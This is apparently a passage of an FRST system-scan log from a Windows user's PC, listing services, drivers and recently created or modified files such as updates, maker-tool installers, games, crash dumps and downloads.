R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 CrypKey License; C:\Windows\system32\crypserv.exe [126976 2010-03-18] (CrypKey (Canada) Ltd.) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1636936 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-28] (Microsoft Corporation -> Microsoft Corporation)
R2 KiteService; C:\Program Files\Kite\KiteService.exe [141936 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
S3 mracsvc; C:\Windows\System32\mracsvc.exe [20034712 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2019-05-25] (Even Balance, Inc. -> )
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [187904 2017-09-28] (Microsoft Corporation) [File not signed]
R2 TeamViewer; D:\Programy\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe [474768 2017-03-01] (Wondershare software CO., LIMITED -> Wondershare)
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [69016 2019-03-04] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2018-08-19] (Martin Malik - REALiX -> REALiX(tm))
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{9477AFEC-D9BC-43C6-A41A-F6B028BF0EDC}\MpKslDrv.sys [47328 2020-10-22] (Microsoft Windows -> Microsoft Corporation)
S3 mracdrv; C:\Windows\System32\drivers\mracdrv.sys [19266680 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R1 NetworkX; C:\Windows\System32\ckldrv.sys [30272 2010-03-19] (CrypKey (Canada) Inc. -> )
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [60504 2020-04-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 xb1usb; C:\Windows\System32\drivers\xb1usb.sys [42760 2019-03-31] (Windows Central Build Account - X -> Microsoft Corporation)
U4 npcap_wifi; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-23 10:44 - 2020-10-23 10:45 - 000030049 _____ C:\Users\Tomika\Desktop\FRST.txt
2020-10-23 10:44 - 2020-10-23 10:45 - 000000000 ____D C:\FRST
2020-10-23 10:42 - 2020-10-23 10:42 - 002299904 _____ (Farbar) C:\Users\Tomika\Desktop\FRST64.exe
2020-10-23 08:55 - 2020-10-23 08:55 - 000067246 _____ C:\Users\Tomika\Downloads\[SkT]Simon_Scarrow_-_serie_Quintus_Licinius_Cato_(2016-2020_CZ).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021972 _____ C:\Users\Tomika\Downloads\[SkT]Jozef_Karika__Cierny_kruh__Koniec_mafie_(2020)(SK).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021451 _____ C:\Users\Tomika\Downloads\[SkT]____Brian_W._Aldiss_-_Nonstop_(1989)(CZ).torrent
2020-10-23 08:40 - 2020-10-23 09:27 - 843273297 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip
2020-10-22 19:55 - 2020-10-22 20:09 - 061341305 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip.crdownload
2020-10-19 21:47 - 2020-10-19 21:47 - 001013608 _____ C:\Users\Tomika\Downloads\sous vide review.pdf
2020-10-19 20:04 - 2020-10-19 20:04 - 000275000 _____ C:\Windows\Minidump\101920-50875-01.dmp
2020-10-17 19:31 - 2020-10-17 19:31 - 000420752 _____ C:\Windows\Minidump\101720-31906-01.dmp
2020-10-13 19:47 - 2020-09-30 09:20 - 000135240 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2020-10-13 19:47 - 2020-09-30 05:04 - 003332608 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-10-13 19:47 - 2020-09-30 04:56 - 000445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-10-13 19:47 - 2020-09-30 04:48 - 001118720 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2020-10-13 19:47 - 2020-09-30 04:15 - 001381888 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2020-10-13 19:47 - 2020-09-29 07:32 - 000115616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2020-10-13 19:47 - 2020-09-29 06:11 - 003642368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-10-13 19:47 - 2020-09-29 06:00 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-10-13 19:47 - 2020-09-29 05:54 - 001067520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpedit.dll
2020-10-13 19:47 - 2020-09-24 08:47 - 000120832 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2020-10-13 19:47 - 2020-09-24 08:43 - 002535968 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-10-13 19:47 - 2020-09-24 08:36 - 007363320 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-10-13 19:47 - 2020-09-24 08:36 - 002173392 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-10-13 19:47 - 2020-09-24 08:01 - 025759232 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-10-13 19:47 - 2020-09-24 07:01 - 000098104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2020-10-13 19:47 - 2020-09-24 07:00 - 001902240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-10-13 19:47 - 2020-09-24 06:53 - 001561296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-10-13 19:47 - 2020-09-24 06:28 - 002914304 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000581120 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 06:16 - 005500416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-10-13 19:47 - 2020-09-24 06:14 - 000785408 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-10-13 19:47 - 2020-09-24 06:13 - 020293632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-10-13 19:47 - 2020-09-24 06:04 - 000517120 _____ (Microsoft Corporation) C:\Windows\system32\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:57 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-10-13 19:47 - 2020-09-24 05:55 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 05:54 - 002306048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:52 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:51 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 000653824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-10-13 19:47 - 2020-09-24 05:41 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:40 - 015494144 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-10-13 19:47 - 2020-09-24 05:39 - 000484352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000381952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:38 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:37 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:33 - 003631616 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000392192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-10-13 19:47 - 2020-09-24 05:31 - 000076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:29 - 002750464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000110080 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:25 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-10-13 19:47 - 2020-09-24 05:23 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000333312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:21 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:20 - 013872640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:18 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:15 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:13 - 000092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:10 - 000133120 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-10-13 19:47 - 2020-09-24 05:08 - 000905728 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 05:08 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 002551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 001099264 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-10-13 19:47 - 2020-09-24 05:06 - 000866304 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2020-10-13 19:47 - 2020-09-24 05:04 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:03 - 000801280 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 05:01 - 001920512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 001341952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 000711168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 04:59 - 000710656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003826176 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003551744 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2020-10-13 19:47 - 2020-09-24 04:53 - 001684992 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-10-13 19:47 - 2020-09-24 04:52 - 003278848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2020-10-13 19:47 - 2020-09-15 09:06 - 001311776 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-10-13 19:47 - 2020-09-15 08:57 - 000325320 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-10-13 19:47 - 2020-09-15 07:24 - 000245752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-10-13 19:47 - 2020-09-15 06:49 - 000281088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2020-10-13 19:47 - 2020-09-15 06:15 - 001040384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-10-13 19:47 - 2020-09-11 18:31 - 000367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-10-13 19:47 - 2020-09-11 11:39 - 000288768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2020-10-13 19:47 - 2020-09-11 10:23 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-10-13 19:47 - 2020-09-11 01:49 - 001370680 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2020-10-13 19:47 - 2020-09-10 23:27 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-10-13 19:47 - 2020-09-10 22:20 - 001757184 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 22:14 - 002349056 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-10-13 19:47 - 2020-09-10 22:11 - 001088512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2020-10-13 19:47 - 2020-09-10 22:02 - 001495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 21:56 - 001551360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-10-13 19:47 - 2020-09-10 03:24 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-10-13 19:34 - 2020-10-13 19:34 - 000275103 _____ C:\Users\Tomika\Downloads\STV-deti-2xA4_Slovenská-aikido-asociácia.pdf
2020-10-12 20:26 - 2020-10-12 20:26 - 000372610 _____ C:\Users\Tomika\Downloads\Vagnerová, Jana - Pandemie .epub
2020-10-10 11:10 - 2020-10-10 11:10 - 000000000 ____D C:\Users\Tomika\Downloads\menu_simple
2020-10-09 19:49 - 2020-10-09 21:16 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\PrusaSlicer
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\Users\Public\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\ProgramData\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\Users\Public\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\ProgramData\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prusa3D
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\Program Files\Prusa3D
2020-10-09 19:31 - 2015-09-23 13:12 - 000000625 _____ C:\Users\Tomika\printrunconf.ini
2020-10-09 19:30 - 2020-10-09 19:30 - 380393624 _____ (Prusa Research a.s. ) C:\Users\Tomika\Downloads\prusa3d_win_2_2_9_1.exe
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Mitov
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visuino
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Program Files (x86)\Mitov
2020-10-09 11:44 - 2020-10-09 11:44 - 010153506 _____ C:\Users\Tomika\Downloads\tandt4-two-buttons-or-rotary encoder=infinite-functions(menu+oled-display).zip
2020-10-07 22:00 - 2020-10-07 22:02 - 384825382 _____ C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69.zip
2020-10-07 22:00 - 2020-10-07 22:00 - 136887134 _____ C:\Users\Tomika\Downloads\Visuino_7_8_3_69.zip
2020-10-03 09:52 - 2020-10-03 09:52 - 000420816 _____ C:\Windows\Minidump\100320-13437-01.dmp
2020-10-02 19:07 - 2020-10-03 01:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 21:45 - 2020-09-26 21:45 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\InxileEntertainment
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\Users\Public\Desktop\Wasteland 3.lnk
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\ProgramData\Desktop\Wasteland 3.lnk
2020-09-25 16:20 - 2020-09-25 16:20 - 000000864 _____ C:\Users\Tomika\Desktop\They Are Billions.lnk
2020-09-23 19:01 - 2020-09-23 19:01 - 000420816 _____ C:\Windows\Minidump\092320-26531-01.dmp

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-23 10:08 - 2016-05-02 19:14 - 000003596 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2643689781-145595849-2857803826-1001
2020-10-23 10:02 - 2020-01-15 19:52 - 000000000 ____D C:\Program Files\Blender Foundation
2020-10-23 10:02 - 2019-09-04 21:41 - 000001135 _____ C:\Users\Tomika\Desktop\blender.lnk
2020-10-23 10:02 - 2019-09-04 21:41 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender
2020-10-23 09:58 - 2017-11-21 00:03 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\Mozilla
2020-10-23 09:56 - 2016-06-10 09:37 - 000000000 ____D C:\Users\Tomika\AppData\Local\Autodesk
2020-10-23 09:49 - 2016-05-04 19:07 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\qBittorrent
2020-10-23 08:30 - 2020-01-01 16:07 - 000003088 _____ C:\Windows\system32\Tasks\Driver Booster Scheduler
2020-10-23 08:30 - 2020-01-01 16:07 - 000003080 _____ C:\Windows\system32\Tasks\Driver Booster Update
2020-10-23 08:30 - 2020-01-01 16:07 - 000002836 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Tomika)
2020-10-23 08:28 - 2017-09-16 12:00 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\WTablet
2020-10-23 08:28 - 2016-05-15 19:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-23 08:28 - 2016-05-02 19:13 - 000000000 __SHD C:\Users\Tomika\IntelGraphicsProfiles
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-10-22 23:00 - 2013-09-30 06:20 - 000865068 _____ C:\Windows\system32\PerfStringBackup.INI
2020-10-22 23:00 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2020-10-22 22:46 - 2018-05-09 19:01 - 000000000 ____D C:\Users\Tomika\Downloads\mil
2020-10-22 22:11 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\NDF
2020-10-22 00:39 - 2016-05-02 19:13 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-10-21 20:09 - 2019-05-29 18:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-21 20:08 - 2018-12-09 17:49 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-21 20:08 - 2016-05-03 12:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-21 19:55 - 2016-05-02 19:23 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-20 20:06 - 2013-08-22 15:25 - 000000187 _____ C:\Windows\win.ini
2020-10-20 20:05 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-19 22:51 - 2016-05-02 19:09 - 000000000 ____D C:\Users\Tomika
2020-10-19 20:04 - 2020-03-13 18:40 - 1137619341 _____ C:\Windows\MEMORY.DMP
2020-10-19 20:04 - 2016-05-03 12:49 - 000000000 ____D C:\Windows\Minidump
2020-10-18 23:11 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\discord
2020-10-17 15:03 - 2020-03-23 23:02 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Code
2020-10-17 12:48 - 2020-03-23 23:17 - 000000000 ____D C:\Users\Tomika\.pylint.d
2020-10-17 12:03 - 2020-09-08 21:25 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Kite
2020-10-17 11:47 - 2020-03-23 23:01 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2020-10-16 19:58 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2020-10-16 19:46 - 2020-09-08 21:24 - 000000000 ____D C:\Program Files\Kite
2020-10-16 12:00 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2020-10-16 10:01 - 2020-03-04 22:12 - 000000000 ____D C:\Users\Tomika\AppData\Local\Arduino15
2020-10-16 09:28 - 2016-05-02 19:04 - 000103424 ____N C:\Windows\Minidump\101620-10890-01.dmp
2020-10-15 21:58 - 2016-05-02 19:22 - 000003386 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 21:58 - 2016-05-02 19:22 - 000003258 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 23:09 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2020-10-13 23:08 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2020-10-13 20:29 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2020-10-13 19:44 - 2019-01-01 12:24 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2020-10-13 19:44 - 2019-01-01 12:24 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\Macromed
2020-10-09 19:32 - 2016-05-08 15:48 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-09 00:17 - 2019-10-03 22:39 - 000003450 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-10-06 22:55 - 2016-05-26 22:56 - 000002296 ____H C:\Users\Tomika\Documents\Default.rdp
2020-10-06 22:54 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\FxsTmp
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Atom
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\.atom
2020-10-04 16:41 - 2020-03-07 15:26 - 000000000 ____D C:\Users\Tomika\.platformio
2020-10-04 16:30 - 2019-08-11 21:57 - 000002117 _____ C:\Users\Tomika\Desktop\Atom.lnk
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Local\atom
2020-10-04 12:49 - 2020-05-05 19:43 - 000002173 _____ C:\Users\Tomika\Desktop\Discord.lnk
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Local\Discord
2020-10-03 13:40 - 2016-12-17 10:05 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-10-03 01:24 - 2019-10-12 10:45 - 000001221 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-10-02 22:58 - 2013-08-22 17:38 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-02 22:58 - 2013-08-22 17:38 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-26 21:46 - 2016-11-19 00:31 - 000000000 ____D C:\Users\Tomika\Documents\My Games
2020-09-26 21:21 - 2017-07-14 22:38 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-09-25 15:51 - 2017-09-17 20:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\Users\Public\Desktop\Google Slides.lnk
